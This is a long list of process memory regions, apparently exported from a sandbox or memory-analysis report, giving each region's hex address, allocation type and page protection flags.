9D00000
trusted library allocation
page read and write
2437CC3B000
heap
page read and write
6D30000
trusted library allocation
page read and write
9D30000
trusted library allocation
page read and write
3121000
trusted library allocation
page read and write
8B2C000
direct allocation
page read and write
9DF5000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
4871000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
242CDD2B000
heap
page read and write
7C80000
trusted library allocation
page read and write
6C68000
direct allocation
page read and write
8DE0000
trusted library allocation
page read and write
8CB0000
unkown
page read and write
8EB0000
trusted library allocation
page read and write
1A051A00000
heap
page read and write
20FB922A000
heap
page read and write
7ED0000
trusted library allocation
page read and write
6C70000
direct allocation
page read and write
7CC0000
unkown
page read and write
8EB0000
trusted library allocation
page read and write
8F80000
trusted library allocation
page read and write
9DED000
trusted library allocation
page read and write
A090000
trusted library allocation
page read and write
AF58000
trusted library allocation
page read and write
5530000
heap
page read and write
9CE0000
trusted library allocation
page read and write
8FE0000
trusted library allocation
page execute and read and write
8E90000
trusted library allocation
page read and write
5727000
heap
page read and write
9200000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
AE4B000
trusted library allocation
page read and write
B03B000
trusted library allocation
page read and write
2437CA80000
heap
page read and write
558C000
trusted library allocation
page read and write
56D000
stack
page read and write
7C80000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
91B3000
trusted library allocation
page read and write
91190AB000
stack
page read and write
8EC0000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
576D000
heap
page read and write
7C50000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
12A0000
heap
page read and write
9DA0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
6D2D000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
9E03000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
7C50000
trusted library allocation
page read and write
8CD0000
trusted library allocation
page read and write
7D40000
trusted library allocation
page read and write
6B50000
trusted library allocation
page read and write
9D33000
trusted library allocation
page read and write
1F65E449000
heap
page read and write
271A7902000
heap
page read and write
91B0000
trusted library allocation
page read and write
6D10000
trusted library allocation
page read and write
7EB0000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
4B31000
trusted library allocation
page read and write
5160000
trusted library allocation
page read and write
524B000
heap
page read and write
1FDF4267000
heap
page read and write
12BEDFE000
stack
page read and write
9184000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
99000
stack
page read and write
8D00000
trusted library allocation
page read and write
7E80000
trusted library allocation
page read and write
920F000
trusted library allocation
page read and write
551E000
stack
page read and write
8AA0000
trusted library allocation
page read and write
91197FE000
stack
page read and write
8AB0000
trusted library allocation
page read and write
8EC0000
trusted library allocation
page read and write
9D58000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
6D6D000
trusted library allocation
page read and write
8D7B000
trusted library allocation
page read and write
6C60000
trusted library allocation
page read and write
7EC0000
trusted library allocation
page read and write
5210000
heap
page read and write
8B70000
trusted library allocation
page read and write
6D13000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
7E90000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
8C75000
unkown
page read and write
8E90000
trusted library allocation
page read and write
7260000
trusted library allocation
page read and write
9210000
trusted library allocation
page read and write
AF48000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
91B5000
unkown
page read and write
56F0000
heap
page read and write
8E80000
trusted library allocation
page read and write
4868000
trusted library allocation
page read and write
4970000
heap
page read and write
8E6000
heap
page read and write
8AB0000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
242CDD23000
heap
page read and write
ACE0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
9D40000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
AFB9000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
2437CC29000
heap
page read and write
8E90000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
9210000
trusted library allocation
page read and write
9D00000
trusted library allocation
page read and write
8CA0000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
8ED000
heap
page read and write
8E60000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
83F000
stack
page read and write
650000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
9180000
trusted library allocation
page read and write
8CA0000
trusted library allocation
page read and write
8C99000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
8E20000
trusted library allocation
page read and write
8F10000
unkown
page read and write
12BE4FB000
stack
page read and write
6C90000
trusted library allocation
page read and write
8F60000
trusted library allocation
page read and write
91C0000
unkown
page read and write
6BC0000
trusted library allocation
page read and write
242CDF05000
heap
page read and write
7CC0000
trusted library allocation
page read and write
8F00000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
8C66000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
4A50000
heap
page read and write
6D50000
trusted library allocation
page execute and read and write
8CC0000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
6B40000
trusted library allocation
page read and write
9170000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
48B0000
trusted library allocation
page read and write
6C80000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
7ED0000
unkown
page read and write
8E90000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
8C40000
trusted library allocation
page read and write
2437CC57000
heap
page read and write
8C70000
trusted library allocation
page read and write
7C30000
trusted library allocation
page read and write
7C60000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
9D00000
trusted library allocation
page read and write
10067F000
stack
page read and write
524E000
stack
page read and write
9CE0000
trusted library allocation
page read and write
5273000
heap
page read and write
A60F000
stack
page read and write
8AC0000
unkown
page read and write
8C70000
trusted library allocation
page read and write
B0A5000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
271A7029000
heap
page read and write
1A051A63000
heap
page read and write
9CB0000
trusted library allocation
page read and write
7040000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
5769000
heap
page read and write
7E60000
trusted library allocation
page read and write
7E80000
trusted library allocation
page read and write
5760000
heap
page read and write
8FE0000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
9CE6000
trusted library allocation
page read and write
8CA0000
trusted library allocation
page read and write
523E000
stack
page read and write
8F00000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
8C78000
trusted library allocation
page read and write
7EF3000
trusted library allocation
page read and write
3709EFC000
stack
page read and write
8C60000
trusted library allocation
page read and write
D59000
heap
page read and write
6BB0000
trusted library allocation
page read and write
8F70000
trusted library allocation
page read and write
8F00000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
8C10000
trusted library allocation
page read and write
9CF9000
trusted library allocation
page read and write
5218000
heap
page read and write
6B60000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
5BA000
heap
page read and write
2437CC56000
heap
page read and write
8AD0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
5765000
heap
page read and write
9BCA000
stack
page read and write
D6D000
heap
page read and write
7DA1000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
7EC6000
trusted library allocation
page read and write
5725000
heap
page read and write
8E90000
trusted library allocation
page read and write
6F050000
unkown
page readonly
B0DA000
trusted library allocation
page read and write
7ED0000
unkown
page read and write
A5A0A7C000
stack
page read and write
8D70000
trusted library allocation
page read and write
7E80000
trusted library allocation
page read and write
1B09EBE0000
trusted library allocation
page read and write
4896000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
7C50000
trusted library allocation
page read and write
271A8110000
trusted library section
page readonly
6BB0000
trusted library allocation
page read and write
1A0517C0000
heap
page read and write
2437CC44000
heap
page read and write
91B5000
unkown
page read and write
6BC0000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
A5A107B000
stack
page read and write
26B647F000
stack
page read and write
8AB0000
trusted library allocation
page read and write
528A000
heap
page read and write
1A051A67000
heap
page read and write
8BF0000
trusted library allocation
page read and write
542C000
stack
page read and write
7EE0000
trusted library allocation
page read and write
1B09EC13000
heap
page read and write
8EB0000
trusted library allocation
page read and write
271AC864000
heap
page read and write
8E90000
trusted library allocation
page read and write
70B0000
heap
page read and write
8D90000
trusted library allocation
page read and write
6E40000
trusted library allocation
page read and write
506F000
direct allocation
page read and write
5015000
trusted library allocation
page read and write
53E8000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
78A4000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
578000
heap
page read and write
870000
heap
page read and write
6D20000
trusted library allocation
page read and write
20A95E40000
heap
page read and write
437B000
stack
page read and write
9200000
trusted library allocation
page read and write
8F00000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
527E000
heap
page read and write
576D000
heap
page read and write
8E40000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
6BB0000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
50C3000
trusted library allocation
page read and write
491E000
stack
page read and write
8E90000
trusted library allocation
page read and write
4E3E000
stack
page read and write
BFA000
stack
page read and write
B8F4CFD000
stack
page read and write
7EB0000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
6CB0000
trusted library allocation
page read and write
55E000
stack
page read and write
6EB000
stack
page read and write
8CA0000
trusted library allocation
page read and write
1A051A02000
heap
page read and write
489D000
trusted library allocation
page read and write
8C80000
trusted library allocation
page read and write
408000
unkown
page readonly
8EB7000
trusted library allocation
page read and write
ACB0000
trusted library allocation
page read and write
8C1F000
unkown
page read and write
8C37000
trusted library allocation
page read and write
270E000
stack
page read and write
271A7FE0000
trusted library allocation
page read and write
20A95F02000
heap
page read and write
721E000
stack
page read and write
1FDF4130000
heap
page read and write
AFB0000
trusted library allocation
page read and write
9DD1000
trusted library allocation
page read and write
5767000
heap
page read and write
8F9E000
stack
page read and write
78A0000
trusted library allocation
page read and write
7E80000
trusted library allocation
page read and write
AFE6000
trusted library allocation
page read and write
534F000
stack
page read and write
8AB0000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
6D00000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
9CE0000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
7F10000
trusted library allocation
page read and write
8F60000
trusted library allocation
page read and write
B2B1000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
8EC0000
trusted library allocation
page read and write
93F000
stack
page read and write
8ED0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
20A95CE0000
heap
page read and write
7EE0000
trusted library allocation
page read and write
D28000
heap
page read and write
A0F000
heap
page read and write
8C60000
trusted library allocation
page read and write
7E80000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
5070000
direct allocation
page read and write
55AE000
trusted library allocation
page read and write
4867000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
AD01000
trusted library allocation
page read and write
271A70FD000
heap
page read and write
8ED0000
trusted library allocation
page read and write
4871000
trusted library allocation
page read and write
4ABF000
stack
page read and write
7E60000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
8F10000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
271AC800000
heap
page read and write
510F000
stack
page read and write
9CF0000
trusted library allocation
page read and write
8EE0000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
5784000
heap
page read and write
7ED0000
unkown
page read and write
B04D000
trusted library allocation
page read and write
7DFA000
trusted library allocation
page read and write
7C30000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
1FDF4A02000
heap
page read and write
5040000
heap
page read and write
AEF9000
trusted library allocation
page read and write
7D40000
trusted library allocation
page read and write
8BF0000
trusted library allocation
page read and write
8C40000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
1343F7E000
stack
page read and write
8F60000
trusted library allocation
page read and write
2437CC32000
heap
page read and write
448000
unkown
page readonly
9D03000
trusted library allocation
page read and write
9DFA000
trusted library allocation
page read and write
370A1FE000
stack
page read and write
8C30000
trusted library allocation
page read and write
6D90000
trusted library allocation
page read and write
7EC0000
trusted library allocation
page read and write
8C10000
trusted library allocation
page read and write
8AD000
heap
page read and write
8C70000
unkown
page read and write
1FDF4213000
heap
page read and write
8C60000
trusted library allocation
page read and write
9D50000
trusted library allocation
page read and write
7D60000
trusted library allocation
page read and write
A080000
trusted library allocation
page read and write
448000
unkown
page readonly
9CF0000
trusted library allocation
page read and write
12BE9FD000
stack
page read and write
8E90000
trusted library allocation
page read and write
9D20000
trusted library allocation
page read and write
9A0000
heap
page read and write
8E90000
trusted library allocation
page read and write
9D10000
trusted library allocation
page execute and read and write
242CDED0000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
8B10000
direct allocation
page read and write
515000
heap
page read and write
91B0000
trusted library allocation
page read and write
6BC0000
trusted library allocation
page read and write
3130000
trusted library allocation
page read and write
2437CC79000
heap
page read and write
271AC490000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
4865000
trusted library allocation
page read and write
20FB9202000
heap
page read and write
242CEAB0000
unkown
page read and write
8D70000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
4BCC000
stack
page read and write
4930000
heap
page read and write
7040000
trusted library allocation
page read and write
9070000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
7E50000
trusted library section
page read and write
D61000
heap
page read and write
48F8000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
8F7F000
trusted library allocation
page read and write
271AC630000
trusted library allocation
page read and write
29D0000
unkown
page readonly
6B38000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
91195FB000
stack
page read and write
B2A9000
trusted library allocation
page read and write
7EB0000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
6C70000
trusted library allocation
page read and write
12BEBFF000
stack
page read and write
490000
trusted library allocation
page read and write
9CE0000
trusted library allocation
page read and write
9275000
trusted library allocation
page read and write
2437CC58000
heap
page read and write
8C20000
trusted library allocation
page read and write
BC0000
heap
page read and write
6D80000
trusted library allocation
page read and write
7E80000
trusted library allocation
page read and write
5396000
trusted library allocation
page read and write
2D90000
heap
page read and write
5B62000
trusted library allocation
page read and write
8FE0000
trusted library allocation
page read and write
906000
heap
page read and write
8AC0000
trusted library allocation
page read and write
B2DD000
trusted library allocation
page read and write
8C90000
trusted library allocation
page read and write
7D82000
trusted library allocation
page read and write
8BF4000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
3100000
heap
page read and write
8D70000
trusted library allocation
page read and write
20A95D80000
trusted library allocation
page read and write
83D000
stack
page read and write
6D0C000
trusted library allocation
page read and write
8FA0000
trusted library allocation
page read and write
7EF0000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
89A000
heap
page read and write
4871000
trusted library allocation
page read and write
7E80000
trusted library allocation
page read and write
8C10000
trusted library allocation
page read and write
D81000
heap
page read and write
4901000
trusted library allocation
page read and write
18199F08000
heap
page read and write
8F98000
trusted library allocation
page read and write
4FA1000
direct allocation
page read and write
271A7094000
heap
page read and write
9240000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
9E37000
trusted library allocation
page read and write
2437CC66000
heap
page read and write
8FF0000
trusted library allocation
page read and write
8FA0000
trusted library allocation
page read and write
8E50000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
20FB9802000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
8EB0000
unkown
page read and write
8D70000
trusted library allocation
page read and write
52BC000
trusted library allocation
page read and write
1343E7F000
stack
page read and write
89D000
heap
page read and write
9DF5000
trusted library allocation
page read and write
9CE0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8C80000
unkown
page read and write
8F60000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
12BECFF000
stack
page read and write
8EF0000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
577E000
heap
page read and write
6BC0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6CE0000
trusted library allocation
page read and write
5EE0000
heap
page read and write
8EB0000
trusted library allocation
page read and write
8C60000
unkown
page read and write
8C77000
trusted library allocation
page read and write
8B70000
trusted library allocation
page read and write
5721000
heap
page read and write
8AF0000
direct allocation
page read and write
8E20000
trusted library allocation
page read and write
8FA0000
trusted library allocation
page read and write
7E7E000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
640000
heap
page read and write
7ED5000
unkown
page read and write
8F60000
trusted library allocation
page read and write
8C65000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
9D0000
heap
page read and write
2437CBF0000
trusted library allocation
page read and write
91198FE000
stack
page read and write
8EF0000
trusted library allocation
page read and write
242CDEF0000
unkown
page read and write
6E74000
trusted library allocation
page read and write
305F000
stack
page read and write
8AA0000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
CC431FE000
stack
page read and write
4E1E000
trusted library allocation
page read and write
10077E000
stack
page read and write
7C50000
trusted library allocation
page read and write
5735000
heap
page read and write
9D24000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
271AC651000
trusted library allocation
page read and write
8BF0000
trusted library allocation
page read and write
9D60000
trusted library allocation
page read and write
271AC770000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
8C90000
trusted library allocation
page read and write
A030000
trusted library allocation
page read and write
5241000
heap
page read and write
6BD0000
direct allocation
page read and write
B198000
trusted library allocation
page read and write
18199E55000
heap
page read and write
6C50000
direct allocation
page read and write
7CC0000
trusted library allocation
page read and write
242CE840000
unkown
page read and write
A5A13FF000
stack
page read and write
8C20000
trusted library allocation
page read and write
7EF0000
trusted library allocation
page read and write
91F0000
trusted library allocation
page read and write
B160000
trusted library allocation
page read and write
8FE0000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
905000
heap
page read and write
70A0000
heap
page read and write
8AD0000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
7C20000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
B8F4EFF000
stack
page read and write
1007FC000
stack
page read and write
8C77000
trusted library allocation
page read and write
242CDC90000
heap
page read and write
B7E000
stack
page read and write
48A0000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
8F83000
trusted library allocation
page read and write
B8F4D7F000
stack
page read and write
8AB0000
trusted library allocation
page read and write
7E24000
trusted library allocation
page read and write
7C30000
trusted library allocation
page read and write
4D3F000
stack
page read and write
4880000
trusted library allocation
page read and write
8F5000
heap
page read and write
9CB0000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
DBB000
heap
page read and write
7EE0000
trusted library allocation
page read and write
1F65E413000
heap
page read and write
8AA5000
trusted library allocation
page read and write
960000
unkown
page read and write
8C40000
trusted library allocation
page read and write
7C70000
trusted library allocation
page read and write
8C70000
unkown
page read and write
7EE5000
trusted library allocation
page read and write
7E15000
trusted library allocation
page read and write
B08B000
trusted library allocation
page read and write
78A6000
trusted library allocation
page read and write
8BF0000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
528F000
stack
page read and write
8CB0000
trusted library allocation
page read and write
8F40000
trusted library allocation
page execute and read and write
2437CC4E000
heap
page read and write
905000
heap
page read and write
8C20000
trusted library allocation
page read and write
7DD4000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8BE000
stack
page read and write
8C75000
trusted library allocation
page read and write
7E0A000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
271AC83F000
heap
page read and write
7E0F000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
2E0000
heap
page read and write
9EE000
stack
page read and write
5050000
direct allocation
page read and write
6D40000
trusted library allocation
page read and write
8CF0000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
4CFE000
stack
page read and write
A5A11FF000
stack
page read and write
8F80000
trusted library allocation
page read and write
AE61000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
8FE000
stack
page read and write
271A80E0000
trusted library section
page readonly
CC4307E000
stack
page read and write
8ED0000
trusted library allocation
page read and write
7C60000
trusted library allocation
page read and write
6D90000
trusted library allocation
page read and write
9D00000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
7E24000
trusted library allocation
page read and write
100D7F000
stack
page read and write
899000
heap
page read and write
8CE0000
trusted library allocation
page read and write
9D00000
trusted library allocation
page read and write
8F60000
trusted library allocation
page read and write
271A7102000
heap
page read and write
7EC0000
unkown
page read and write
8CC0000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
1FDF426C000
heap
page read and write
7EF0000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
242CEA60000
unkown
page read and write
AE43000
trusted library allocation
page read and write
20A95E13000
heap
page read and write
6A1000
stack
page read and write
AF09000
trusted library allocation
page read and write
7DE8000
trusted library allocation
page read and write
B24C000
trusted library allocation
page read and write
271AC790000
remote allocation
page read and write
5595000
trusted library allocation
page read and write
271A7730000
trusted library allocation
page read and write
7C60000
trusted library allocation
page read and write
91C0000
trusted library allocation
page read and write
6BC0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
2F0000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
8C90000
trusted library allocation
page execute and read and write
271AC904000
heap
page read and write
C68000
heap
page read and write
8EE0000
trusted library allocation
page read and write
2384000
heap
page read and write
8E40000
trusted library allocation
page read and write
570D000
heap
page read and write
44BF000
stack
page read and write
9D08000
trusted library allocation
page read and write
6BC0000
trusted library allocation
page read and write
8C50000
trusted library allocation
page read and write
AEA9000
trusted library allocation
page read and write
AEE7000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
8ADC000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
5774000
heap
page read and write
90B2000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
AFC9000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
4FE0000
trusted library allocation
page read and write
2437CC5F000
heap
page read and write
4893000
trusted library allocation
page read and write
6D60000
trusted library allocation
page read and write
569E000
stack
page read and write
7CC0000
trusted library allocation
page read and write
1B09EA10000
heap
page read and write
8AD0000
trusted library allocation
page execute and read and write
8C60000
unkown
page read and write
7CC5000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
7C70000
trusted library allocation
page read and write
40A000
unkown
page read and write
1F65E508000
heap
page read and write
4882000
trusted library allocation
page read and write
8AD0000
unkown
page read and write
8C30000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
8C40000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
5B3D000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
8E92000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
4BB0000
heap
page read and write
4876000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
AEB5000
trusted library allocation
page read and write
8E92000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
7CCD000
unkown
page read and write
8E40000
trusted library allocation
page read and write
AEC5000
trusted library allocation
page read and write
8AC5000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
8CF0000
trusted library allocation
page read and write
8DB0000
trusted library allocation
page read and write
878000
heap
page read and write
6E50000
trusted library allocation
page read and write
491F000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
5725000
heap
page read and write
CC433FE000
stack
page read and write
8AB0000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
8EFA000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
8F40000
trusted library allocation
page read and write
8B9E000
unkown
page read and write
9CC0000
trusted library allocation
page read and write
8F10000
trusted library allocation
page read and write
242CDD3C000
heap
page read and write
7E80000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
5EF0000
direct allocation
page read and write
8F90000
trusted library allocation
page read and write
6BB0000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
1FDF4200000
heap
page read and write
3106000
heap
page read and write
8E90000
trusted library allocation
page read and write
8F60000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
8C60000
unkown
page read and write
271AC4A0000
trusted library allocation
page read and write
271AC700000
trusted library allocation
page read and write
90B2000
trusted library allocation
page read and write
B8F4C7E000
stack
page read and write
8E80000
trusted library allocation
page read and write
9DFC000
trusted library allocation
page read and write
8AC0000
trusted library allocation
page read and write
5F50000
direct allocation
page read and write
B02A000
trusted library allocation
page read and write
7CE000
stack
page read and write
271AC900000
heap
page read and write
9D40000
trusted library allocation
page read and write
8C80000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
6D00000
trusted library allocation
page read and write
6B70000
trusted library allocation
page read and write
B12A000
trusted library allocation
page read and write
1B09F202000
trusted library allocation
page read and write
8F60000
trusted library allocation
page read and write
6BC0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
8E60000
trusted library allocation
page read and write
DBB000
heap
page read and write
8CA0000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
6D20000
trusted library allocation
page read and write
7EB0000
trusted library allocation
page read and write
26B5CEC000
stack
page read and write
9CE0000
trusted library allocation
page read and write
7E04000
trusted library allocation
page read and write
7BF0000
trusted library allocation
page read and write
7EB0000
trusted library allocation
page read and write
AF28000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
8C69000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
BD00000
trusted library allocation
page read and write
570A000
heap
page read and write
8F10000
trusted library allocation
page read and write
B137000
trusted library allocation
page read and write
7C30000
trusted library allocation
page read and write
7E90000
trusted library allocation
page read and write
7C70000
trusted library allocation
page read and write
88D000
heap
page read and write
8C66000
trusted library allocation
page read and write
9CE0000
trusted library allocation
page read and write
8AB0000
unkown
page read and write
4890000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
6BB0000
trusted library allocation
page read and write
8AC0000
unkown
page read and write
1F65E44B000
heap
page read and write
9CD0000
trusted library allocation
page read and write
55A6000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
7C5C000
trusted library allocation
page read and write
271AC790000
remote allocation
page read and write
8AD0000
trusted library allocation
page read and write
7260000
trusted library allocation
page read and write
9245000
trusted library allocation
page read and write
7C70000
trusted library allocation
page read and write
7EE9000
trusted library allocation
page read and write
8CFD000
stack
page read and write
5064000
direct allocation
page read and write
47C8000
heap
page read and write
6B30000
trusted library allocation
page read and write
2437CC6C000
heap
page read and write
8AC0000
unkown
page read and write
9DD4000
trusted library allocation
page read and write
8CA0000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
487E000
trusted library allocation
page read and write
7C40000
trusted library allocation
page read and write
52AF000
heap
page read and write
8F00000
trusted library allocation
page read and write
8C65000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
89E000
heap
page read and write
7ED0000
trusted library allocation
page read and write
7E0F000
trusted library allocation
page read and write
6BA1000
direct allocation
page read and write
8FB0000
trusted library allocation
page read and write
1F65E2B0000
heap
page read and write
8AD0000
trusted library allocation
page read and write
AF17000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
7C30000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
9190000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8C65000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
6D20000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
523B000
heap
page read and write
8E80000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
AC70000
trusted library allocation
page read and write
12BE5FF000
stack
page read and write
8C60000
trusted library allocation
page execute and read and write
8AD3000
trusted library allocation
page read and write
8F10000
trusted library allocation
page read and write
2437CC45000
heap
page read and write
9210000
trusted library allocation
page read and write
20A95E52000
heap
page read and write
9C90000
trusted library allocation
page read and write
2437CC48000
heap
page read and write
9A0000
heap
page read and write
7C30000
trusted library allocation
page read and write
431000
unkown
page read and write
91A0000
trusted library allocation
page read and write
